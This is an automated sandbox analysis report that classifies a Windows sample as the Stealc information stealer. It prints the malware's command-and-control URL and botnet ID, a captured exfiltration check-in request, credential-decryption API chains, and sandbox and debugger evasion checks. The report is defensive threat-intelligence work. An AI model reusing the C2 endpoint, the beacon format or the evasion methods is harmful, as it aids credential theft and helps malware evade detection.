Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528823
MD5:f10c33b85dcdad1afd46afc292250f45
SHA1:cbf1860f2913584c90cb369f65cc2f3f9ed07f7d
SHA256:fef07dfe69df3e939e6a3bc0e097b4507e052f873bd8d0cffe54508c9ce7e6af
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F10C33B85DCDAD1AFD46AFC292250F45)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7112JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7112JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.380000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T10:28:21.774078+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.380000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0038C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00387240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00387240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00389AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00389AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00389B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00389B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00398EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00398EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00394910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0038DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0038E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0038ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00394570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0038BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00393EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003816D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 39 41 37 46 38 46 31 32 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="hwid"6F9A7F8F12D41068540764------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build"doma------JKJDAEBFCBKECBGDBFCF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00386280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00386280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 39 41 37 46 38 46 31 32 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="hwid"6F9A7F8F12D41068540764------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build"doma------JKJDAEBFCBKECBGDBFCF--
                Source: file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1800775191.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.0000000001197000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1800775191.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/01
                Source: file.exe, 00000000.00000002.1800775191.0000000001197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/4D
                Source: file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpBa
                Source: file.exe, 00000000.00000002.1800775191.00000000011AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
                Source: file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpva=T

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D0_2_0075403D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007450050_2_00745005
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007509490_2_00750949
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D411C0_2_006D411C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075B9B40_2_0075B9B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074BA0F0_2_0074BA0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007072E70_2_007072E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00746AAE0_2_00746AAE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00608B2D0_2_00608B2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00619B390_2_00619B39
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074D4990_2_0074D499
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007485660_2_00748566
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075756E0_2_0075756E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00755DB50_2_00755DB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DE6080_2_006DE608
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 003845C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: zmsppxmk ZLIB complexity 0.9947472370715802
                Source: file.exe, 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00399600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00393720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00393720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AIM13Z2D.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1844224 > 1048576
                Source: file.exeStatic PE information: Raw size of zmsppxmk is bigger than: 0x100000 < 0x19c200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.380000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zmsppxmk:EW;bobhsqhc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zmsppxmk:EW;bobhsqhc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00399860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c85f6 should be: 0x1ca4c3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: zmsppxmk
                Source: file.exeStatic PE information: section name: bobhsqhc
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039B035 push ecx; ret 0_2_0039B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083008C push 2A1F704Bh; mov dword ptr [esp], eax0_2_0083009A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083008C push edi; mov dword ptr [esp], 6EFD8D00h0_2_008300B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083008C push ebx; mov dword ptr [esp], esi0_2_008300FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE862 push edi; mov dword ptr [esp], 7FF96F41h0_2_007BE886
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE862 push 7DA59575h; mov dword ptr [esp], eax0_2_007BE943
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE862 push ecx; mov dword ptr [esp], edi0_2_007BE961
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00776843 push 29291C8Dh; mov dword ptr [esp], eax0_2_0077687C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008098B4 push ebx; mov dword ptr [esp], 667AA600h0_2_0080982A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008098B4 push eax; mov dword ptr [esp], ecx0_2_00809967
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077804D push ebp; mov dword ptr [esp], edx0_2_0077806E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C1838 push 4F64F0E6h; mov dword ptr [esp], eax0_2_007C1881
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 2180BEB6h; mov dword ptr [esp], ecx0_2_0075404C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push ebp; mov dword ptr [esp], edx0_2_0075406A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push eax; mov dword ptr [esp], edx0_2_00754085
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push ecx; mov dword ptr [esp], 1CD0B131h0_2_007540CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push eax; mov dword ptr [esp], esi0_2_0075425E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 428A57B3h; mov dword ptr [esp], esi0_2_007543B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push edi; mov dword ptr [esp], 75FF7081h0_2_007543C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 3BA5FA27h; mov dword ptr [esp], edx0_2_007544A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 2F1B1309h; mov dword ptr [esp], esp0_2_007544C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 44AECE45h; mov dword ptr [esp], edi0_2_00754500
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 547A2200h; mov dword ptr [esp], edi0_2_0075451D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push ebx; mov dword ptr [esp], 7F8BB202h0_2_0075453E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push edi; mov dword ptr [esp], esp0_2_00754549
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push ecx; mov dword ptr [esp], edx0_2_00754577
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 47E3AE00h; mov dword ptr [esp], ebx0_2_0075462A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 28DAEC84h; mov dword ptr [esp], esi0_2_00754635
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push ebx; mov dword ptr [esp], 71686C11h0_2_00754639
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 3289A0A8h; mov dword ptr [esp], edi0_2_007546F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075403D push 56463362h; mov dword ptr [esp], esi0_2_007546FF
                Source: file.exeStatic PE information: section name: zmsppxmk entropy: 7.953354892161169

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00399860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13563
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E20D8 second address: 5E20DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA25 second address: 75EA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA29 second address: 75EA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F402CDD4F61h 0x0000000b push ebx 0x0000000c jmp 00007F402CDD4F5Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ED47 second address: 75ED4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ED4B second address: 75ED51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ED51 second address: 75ED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ED5A second address: 75ED77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F402CDD4F56h 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F402CDD4F5Ah 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75ED77 second address: 75ED7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F077 second address: 75F07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F07B second address: 75F081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
